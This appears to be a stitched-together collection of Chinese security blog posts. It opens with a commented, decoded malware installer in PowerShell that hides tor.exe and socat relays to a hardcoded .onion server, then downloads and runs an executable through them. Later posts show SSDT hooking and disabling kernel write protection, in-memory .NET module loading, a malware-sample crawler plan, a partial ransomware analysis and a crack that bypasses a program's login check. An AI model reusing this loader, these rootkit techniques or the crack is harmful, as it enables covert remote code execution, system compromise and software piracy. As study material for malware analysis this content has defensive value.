$WqPfv="vbscript:close(CreateObject(`"WScript.Shell`").Run(`"tor.exe`",0,False))";
xrnOlrj (RandomString) 'mshta.exe' $WqPfv 0 0 $ykF;
$SFile=$env:Temp+'\'+(RandomString)+'.zip';
# Empty-bodied loop: retries the socat download until it succeeds, with no delay or retry limit.
while (!(iGgRLcyIJQBzrA 'https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip' $SFile)){}
FVRClsggMRAZ $SFile $DestTP;
$s_old=$DestTP+'\socat-windows-1.7.2.1\';
$s_new=(RandomString);
Remove-Item -Force $SFile;
# The extracted socat directory is renamed to a random name.
Rename-Item -path $s_old -newName $s_new;
$dLkdOdvs=$DestTP+'\'+$s_new+'\';
# Two loopback-only relays: 127.0.0.1:5555 -> onion port 80 and 127.0.0.1:5588 -> onion port 5588,
# both through the SOCKS listener on 127.0.0.1:9050 (the port the tor.exe started above presumably serves).
$s1cmd='socat tcp4-LISTEN:5555,reuseaddr,fork,keepalive,bind=127.0.0.1 SOCKS4A:127.0.0.1:qr5c2etn6x5lhhfc.onion:80,socksport=9050';
$s2cmd='socat tcp4-LISTEN:5588,reuseaddr,fork,keepalive,bind=127.0.0.1 SOCKS4A:127.0.0.1:qr5c2etn6x5lhhfc.onion:5588,socksport=9050';
$SyASxV="vbscript:close(CreateObject(`"WScript.Shell`").Run(`"$s1cmd`",0,False))";
$CkeHaEMoQb="vbscript:close(CreateObject(`"WScript.Shell`").Run(`"$s2cmd`",0,False))";
xrnOlrj (RandomString) 'mshta.exe' $SyASxV 0 0 $dLkdOdvs;
xrnOlrj (RandomString) 'mshta.exe' $CkeHaEMoQb 0 0 $dLkdOdvs;
# Final stage: a hidden powershell.exe that downloads an .exe through the local relay on port 5555
# (URL carries a random .asp name and the host's public IP as returned by api.ipify.org), saves it
# to %TEMP% under a random name and executes it. "vbsc"+"ript" and "Download"+"String" are split
# literals, presumably to defeat simple string matching.
$wXdRbCFwn="vbsc"+"ript:close(CreateObject(`"WScript.Shell`").Run(`"powershell.exe `"`"`$F=`$env:Temp+'\\"+(RandomString)+".exe';rm -Force `$F;`$cl=(New-Object Net.WebClient);`$cl.DownloadFile('http://127.0.0.1:5555/"+(RandomString)+".asp?ts&ip='+`$cl.Download`"+`"String('http://api.ipify.org/'),`$F);& `$F`"`"`",0,False))";
# Fourth argument is 1 here (0 in the earlier calls); presumably the restart flag that adds the
# one-minute repeating trigger seen in the task-registration code - confirm.
xrnOlrj (RandomString) 'mshta.exe' $wXdRbCFwn 1;
}
# Entry point of the decoded script: the installer routine runs as soon as the script is evaluated.
IwoPMc;

参考链接

  1. https://stackoverflow.com/questions/16846386/run-javascript-function-from-c-without-mfc

windows内核学习:SSDT Hook

内核函数HOOK


static ZWCREATEFILE                OldZwCreateFile; // address of the original service routine, saved by StartHook

/*
 * Replacement routine with the ZwWriteFile parameter list. In this sample it
 * adds no logic of its own: every argument is forwarded untouched to the saved
 * original routine and that routine's status is handed back to the caller.
 * NOTE(review): OldZwWriteFile is not declared anywhere in this listing (only
 * OldZwCreateFile is) - confirm where it is defined.
 */
NTSTATUS Hook_ZwWriteFile(
  IN HANDLE              FileHandle,
  IN HANDLE              Event OPTIONAL,
  IN PIO_APC_ROUTINE      ApcRoutine OPTIONAL,
  IN PVOID                ApcContext OPTIONAL,
  OUT PIO_STATUS_BLOCK    IoStatusBlock,
  IN PVOID                Buffer,
  IN ULONG                Length,
  IN PLARGE_INTEGER      ByteOffset OPTIONAL,
  IN PULONG              Key OPTIONAL )
{
    /* Pure pass-through: nothing is inspected, logged or modified. */
    return OldZwWriteFile(FileHandle,
                          Event,
                          ApcRoutine,
                          ApcContext,
                          IoStatusBlock,
                          Buffer,
                          Length,
                          ByteOffset,
                          Key);
}


/*
 * Installs the hook: clears the write-protect bit in CR0, atomically swaps the
 * service-table entry for ZwCreateFile with Hook_ZwCreateFile (keeping the old
 * pointer in OldZwCreateFile), then sets the write-protect bit again.
 * The inline __asm blocks and the (LONG)/(PLONG) pointer casts make this
 * 32-bit x86 only.
 * NOTE(review): Hook_ZwCreateFile is not defined in this listing; the hook
 * routine shown above is Hook_ZwWriteFile - confirm which one is intended.
 * NOTE(review): CR0 is per-processor and nothing here pins the thread or raises
 * IRQL, so on a multiprocessor system the write may run on a CPU whose WP bit
 * is still set. Service-table modification is also what Kernel Patch Protection
 * on x64 Windows is designed to detect; treat a driver doing this as suspect.
 */
void StartHook (void)
{
    // Original comment: "get the index of the unexported service function".
    // NOTE(review): the four locals below are declared but never used in this snippet.
    HANDLE    hFile;
    PCHAR    pDllFile;
    ULONG  ulSize;
    ULONG  ulByteReaded;

    // Clear bit 16 of CR0 (mask 0FFFEFFFFh) so read-only kernel pages become writable.
    __asm
    {
        push    eax
        mov        eax, CR0
        and        eax, 0FFFEFFFFh
        mov        CR0, eax
        pop        eax
    }
    // Replace the original routine's address with our own hook routine and keep the original address.
    OldZwCreateFile    = (ZWCREATEFILE) InterlockedExchange((PLONG)
                              &SDT(ZwCreateFile),
                              (LONG)Hook_ZwCreateFile);

    // Restore: set bit 16 of CR0 again (NOT 0FFFEFFFFh == 00010000h).
    __asm
    {
        push       eax
        mov        eax, CR0
        or         eax, NOT 0FFFEFFFFh
        mov        CR0, eax
        pop        eax
    }
    return ;
}

windows内核学习:内存操作

在内核中有以下四种内存操作

/* Allocates NumberOfBytes from the pool selected by PoolType; returns NULL on failure.
   Deprecated since Windows 10 version 2004 in favour of ExAllocatePool2. */
PVOID ExAllocatePool(POOL_TYPE PoolType, SIZE_T NumberOfBytes);
/* Copies Length bytes; source and destination ranges may overlap. */
VOID RtlMoveMemory(PVOID Destination, PVOID Source, SIZE_T Length);
/* Sets Length bytes at Destination to Fill. Note the (length, value) order, the reverse of memset's (value, length). */
VOID RtlFillMemory(PVOID Destination, SIZE_T Length, UCHAR Fill);
/* Releases a block obtained from one of the ExAllocatePool* routines. */
VOID ExFreePool(PVOID P);

分别对应C语言的malloc memcpy memset free;

POOL_TYPE常用的有两种:PagedPool 和 NonPagedPool。在内核层内存都是可写可读可执行的。没有类似VirtualProtect的函数。

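/*
 * Demonstrates the four pool/memory routines: allocates one paged and one
 * non-paged buffer, fills the non-paged one with 0x90, copies its first 0x50
 * bytes into the paged one, then frees both.
 * ExAllocatePool returns NULL when the request cannot be satisfied, and a NULL
 * dereference in kernel mode brings the system down, so both results are
 * checked before use and before being freed.
 * NOTE(review): ExAllocatePool is deprecated; new code should use a tagged
 * allocation routine. It is kept here to match the listing.
 */
void test()
{
    PVOID ptr1 = ExAllocatePool(PagedPool,0x100);
    PVOID ptr2 = ExAllocatePool(NonPagedPool,0x200);

    /* Only touch the buffers when both allocations succeeded. */
    if (ptr1 != NULL && ptr2 != NULL)
    {
        RtlFillMemory(ptr2,0x200,0x90);
        /* 0x50 bytes fit inside both the 0x200 source and the 0x100 destination. */
        RtlMoveMemory(ptr1,ptr2,0x50);
    }

    /* Free whichever allocation succeeded so a partial failure does not leak pool. */
    if (ptr1 != NULL)
    {
        ExFreePool(ptr1);
    }
    if (ptr2 != NULL)
    {
        ExFreePool(ptr2);
    }
}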

一般来说,要写入“别人的”内核内存, 必须关闭内存写保护,并把 IRQL 提升到 2 才行(绝大多数时候 IRQL 都为 0, 当 IRQL=2 时,会阻断大部分线程执行, 防止执行出错)。 内存是否处于写保护的状态记录在 CR0 寄存器上,因此直接修改 CR0 寄存器的值即可;而提升或降低IRQL 则使用 KeRaiseIrqlToDpcLevel 和 KeLowerIrql 实现( WIN64 的 IRQL 值记录在 CR8 寄存器上, 而 WIN32 的 IRQL 值记录在 KPCR 上)。

/*
 * Turns off kernel write protection on the current processor and returns the
 * IRQL that was in effect before the call, to be passed back to WPONx64.
 * Order as written: raise IRQL via KeRaiseIrqlToDpcLevel, clear bit 16 of CR0,
 * then disable interrupts.
 * NOTE(review): CR0 is per-processor, so other CPUs keep write protection on.
 * NOTE(review): interrupts are disabled only after CR0 has been written.
 * Clearing CR0.WP from a driver is a strong rootkit indicator; on x64 Windows
 * the code pages this is normally used against are watched by Kernel Patch
 * Protection, and under hypervisor-enforced code integrity such writes are
 * expected to fail - verify on the target build.
 */
KIRQL WPOFFx64()
{
    KIRQL irql=KeRaiseIrqlToDpcLevel();
    UINT64 cr0=__readcr0();
    cr0 &= 0xfffffffffffeffff;   /* clear bit 16 */
    __writecr0(cr0);
    _disable();
    return irql;
}
/*
 * Counterpart of WPOFFx64: sets bit 16 of CR0 again, re-enables interrupts and
 * lowers the IRQL to the value passed in (the value WPOFFx64 returned).
 * NOTE(review): _enable() runs before __writecr0(), so interrupts are back on
 * for a short window while write protection is still off - confirm intent.
 */
void WPONx64(KIRQL irql)
{
    UINT64 cr0=__readcr0();
    cr0 |= 0x10000;              /* set bit 16 */
    _enable();
    __writecr0(cr0);
    KeLowerIrql(irql);
}
/*
 * Usage sketch for the two helpers above: write protection is switched off,
 * 15 bytes from HookCode are copied over the start of NtOpenProcess, and write
 * protection is switched back on.
 * NOTE(review): the calls are spelled WPOFF/WPON while the helpers in this
 * listing are named WPOFFx64/WPONx64; HookCode is not defined on this page.
 * NOTE(review): overwriting the first bytes of a kernel export in place is the
 * kind of modification Kernel Patch Protection checks for on x64 Windows.
 */
void test()
{
   KIRQL irql=WPOFF();
   RtlMoveMemory(NtOpenProcess,HookCode,15);
   WPON(irql);
}

MDL:
申请一个 MDL(类似句柄的玩意),然后尝试锁定页面,如果成功,则让系统分配一个“安全” 的虚拟地址再行写入, 写入完毕后解锁页面并释放掉 MDL。

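/*
 * Copies SizeOfCopy bytes from pSourceAddress to pDestination by describing the
 * destination with an MDL, locking its pages, and writing through the system
 * address returned for that MDL.
 *
 * Returns TRUE only when the copy itself completed; FALSE when an address is
 * not valid, the size does not fit an MDL length, the MDL cannot be allocated,
 * the pages cannot be locked or mapped, or the copy raised an exception.
 *
 * Changes against the original listing:
 *   - a failed MmGetSystemAddressForMdlSafe no longer returns with the pages
 *     still locked and the MDL still allocated;
 *   - an exception during the copy is reported as FALSE instead of TRUE;
 *   - a size that would be truncated by the (ULONG) cast is rejected, because
 *     the MDL would then describe fewer bytes than the copy writes.
 *
 * NOTE(review): MmIsAddressValid only looks at the page holding the first byte
 * and its answer can be stale by the time the copy runs.
 * NOTE(review): the pages are locked with IoReadAccess although the mapping is
 * written to; confirm this is intended rather than IoWriteAccess/IoModifyAccess.
 */
BOOLEAN SafeCopyMemory( PVOID pDestination, PVOID pSourceAddress, SIZE_T SizeOfCopy )
{
    PMDL pMdl = NULL;
    PVOID pSafeAddress = NULL;
    BOOLEAN bCopied = FALSE;

    if( !MmIsAddressValid(pDestination) || !MmIsAddressValid(pSourceAddress) )
        return FALSE;

    /* IoAllocateMdl takes a ULONG length; refuse sizes the cast would truncate. */
    if( (SIZE_T)(ULONG)SizeOfCopy != SizeOfCopy )
        return FALSE;

    pMdl = IoAllocateMdl(pDestination, (ULONG)SizeOfCopy, FALSE, FALSE, NULL );
    if( !pMdl )
        return FALSE;

    /* MmProbeAndLockPages reports failure by raising an exception. */
    __try
    {
        MmProbeAndLockPages( pMdl, KernelMode, IoReadAccess );
    }
    __except(EXCEPTION_EXECUTE_HANDLER)
    {
        IoFreeMdl( pMdl );
        return FALSE;
    }

    pSafeAddress = MmGetSystemAddressForMdlSafe( pMdl, NormalPagePriority );
    if( pSafeAddress )
    {
        __try
        {
            RtlMoveMemory(pSafeAddress, pSourceAddress, SizeOfCopy );
            bCopied = TRUE;
        }
        __except(EXCEPTION_EXECUTE_HANDLER)
        {
            /* The copy faulted part-way; report failure to the caller. */
            bCopied = FALSE;
        }
    }

    /* Single cleanup path: runs whether or not the mapping and copy succeeded. */
    MmUnlockPages( pMdl );
    IoFreeMdl( pMdl );
    return bCopied;
}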

windows内核学习:文件操作

文件基本操作

在进行各类文件操作前,我们需要使用ZwCreateFile创建或打开文件获得文件句柄。然后使用该句柄进行各类操作

创建文件

创建文件对象前,需要先调用RtlInitUnicodeString初始化文件名(UNICODE_STRING),再调用InitializeObjectAttributes初始化OBJECT_ATTRIBUTES结构体:


/*
 * Opens the file named by szFileName for writing, creating it when it does not
 * exist (FILE_OPEN_IF), and closes the handle again straight away.
 * The handle is requested as a kernel handle (OBJ_KERNEL_HANDLE) and the name
 * is matched case-insensitively.
 * Returns the NTSTATUS produced by ZwCreateFile.
 */
NTSTATUS ntCreateFile(WCHAR *szFileName)
{
        NTSTATUS                rcCreate = 0;
        HANDLE                  hCreated = NULL;
        IO_STATUS_BLOCK         ioResult = { 0 };
        UNICODE_STRING          usPath = { 0 };
        OBJECT_ATTRIBUTES       oaPath = { 0 };

        /* Wrap the caller's wide string, then describe the object to open. */
        RtlInitUnicodeString(&usPath, szFileName);
        InitializeObjectAttributes(&oaPath,
                                   &usPath,
                                   OBJ_CASE_INSENSITIVE | OBJ_KERNEL_HANDLE,
                                   NULL,
                                   NULL);

        rcCreate = ZwCreateFile(&hCreated,
                                GENERIC_WRITE,
                                &oaPath,
                                &ioResult,
                                NULL,
                                FILE_ATTRIBUTE_NORMAL,
                                FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE,
                                FILE_OPEN_IF,
                                FILE_SYNCHRONOUS_IO_NONALERT | FILE_NON_DIRECTORY_FILE,
                                NULL,
                                0);

        /* Nothing to release when the create/open failed. */
        if (!NT_SUCCESS(rcCreate))
        {
            return rcCreate;
        }

        ZwClose(hCreated);
        return rcCreate;
}

病毒样本快到碗里来,一个样本下载爬虫的实现


简介

Malwr是一个使用了Cuckoo Sandbox的在线恶意软件分析系统,由于它提供一些病毒样本下载,就想能不能写个爬虫把样本下下来。顺便写篇博客记录下。
页面分析

打开 https://malwr.com/analysis ,我们可以在当前页看到TimeStamp、md5、文件名、文件类型和杀软查杀数,下一页类似。
图片说明

只有MD5的超链接可以点,点进去看看,
图片说明

我写这个爬虫的目的是下载样本,只关心样本的下载地址,并不关心其他的信息。

现在我们可以理清下思路:

   获取每一页的网页源码
   解析当前页的每一个md5对应的详细信息链接
   在详细信息页面解析下载地址。

一款勒索软件的分析-未完待续

文件信息 SHA1:1d03f92b8f824bb065552f0d9e6ddddb(注:该值只有32位十六进制字符,长度与MD5一致而非SHA1的40位,检索样本时请按MD5查询并自行核实)

NSIS脚本分析

使用7zip解压,可以看到其中一个文件是乱码,可能是加密的shellcode。

图片说明

下图是nsis的脚本,前面有很多都是无用的代码,一般都是首先看.oninit回调函数。

我们可以看到它通过wsprintf来拼接字符串,使用nsis的system.dll来调用外部dll。 将加密的shellcode映射到内存,

图片说明

AOSP-docker编译安卓源码绕过反调试

看了很多编译源码的文章,发现很多都有坑,大部分都是环境配置问题,编译不同版本的源码jdk版本不一样,ubuntu版本也不一样。这很让人蛋疼,光是折腾环境就得半天了。

自从有了docker就不一样了,有人把Android源码编译的环境打包成了docker,就是AOSP docker;这样我们就不需要去折腾环境,直接拿人家弄好的来用。

推荐使用linux装docker,不用管是debian还是ubuntu;虽然windows也可以使用docker,但是还是有点小问题。

内存中加载module

内存中加载module

    # Analyst note: loads a .NET module from a byte array held in memory, so the
    # module itself is never written to disk as a file.
    # Steps: define a run-only dynamic assembly, declare a module named 'hello.dll'
    # in it, then supply that module's content from base64-decoded bytes via
    # Assembly.LoadModule and invoke its 'Hello' method by reflection.
    # For detection: the script text (DefineDynamicAssembly, LoadModule,
    # FromBase64String) is visible to PowerShell script block logging.
    $Domain = [AppDomain]::CurrentDomain
    $DynAssembly = New-Object System.Reflection.AssemblyName('TempAssembly')
    # AssemblyBuilderAccess::Run: the dynamic assembly can be executed but not saved.
    $AssemblyBuilder = $Domain.DefineDynamicAssembly($DynAssembly, [Reflection.Emit.AssemblyBuilderAccess]::Run)
    $ModuleBuilder = $AssemblyBuilder.DefineDynamicModule('TempModule')

    # Second module declaration; its name matches the one later passed to LoadModule.
    $ModuleBuilder2 = $AssemblyBuilder.DefineDynamicModule('hello.dll')
    # A concrete type is created so the dynamic assembly can be reached as [TempClass].Assembly below.
    $TypeBuilder = $ModuleBuilder.DefineType('TempClass', [Reflection.TypeAttributes]::Public)
    $TypeBuilder.CreateType()
    # '{PE base64}' is a placeholder for the base64 text of the module to load.
    $HelloDllBytes = [Convert]::FromBase64String('{PE base64}')
    # Calling LoadModule doesn't pass through the internal nLoad method like Assembly/AppDomain.Load does. :)
    $HelloDllModule = [TempClass].Assembly.LoadModule('hello.dll', $HelloDllBytes)
    # Invoke the Hello method within the hello.dll module that was loaded in memory
    $HelloDllModule.GetTypes()[0].GetMethod('Hello').Invoke($null, @())


豆约翰博客备份专家破解

文笔不好,路过的看官求勿喷。

官网下载程序,解压用dnspy来调试主程序BlogDownloader.exe;虽然被混淆,但这样的保护形同虚设,很容易通过动态调试被破解。

F5开始调试。

点击ok,程序会出现登陆框,要输入账号密码。第一步我们先实现免账号登陆,先随便输个账号密码,利用堆栈回溯来找到下图中高亮部分,这里面就是登陆流程部分。

跳转到目标代码,很明显就是对账号密码的判断,我们只要将第一个判断语句的等于改成不等于,空账号登陆。


,